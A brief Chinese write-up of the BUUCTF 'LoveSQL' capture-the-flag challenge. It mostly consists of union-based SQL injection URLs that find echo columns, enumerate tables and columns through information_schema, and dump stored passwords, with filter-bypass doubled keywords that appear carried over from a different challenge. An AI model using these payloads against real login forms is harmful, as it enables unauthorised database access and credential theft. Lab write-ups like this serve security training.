BUUCTF-[极客大挑战 2019]LoveSQL 1详解
作者:互联网
做完了baby sql来到了love sql发现这个注入相比baby sql容易的多
我们还是像baby sql中注入方式一样
于是构造pyload: ?username=admin&password=admin' union select 1,2,3%23
两个回显位
于是就爆数据表:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23
再爆表字段:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23
爆数据:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23
于是一次love sql注入就完成了
标签:username,BUUCTF,23,admin,LoveSQL,2019,sql,table,password 来源: https://www.cnblogs.com/junlebao/p/13804094.html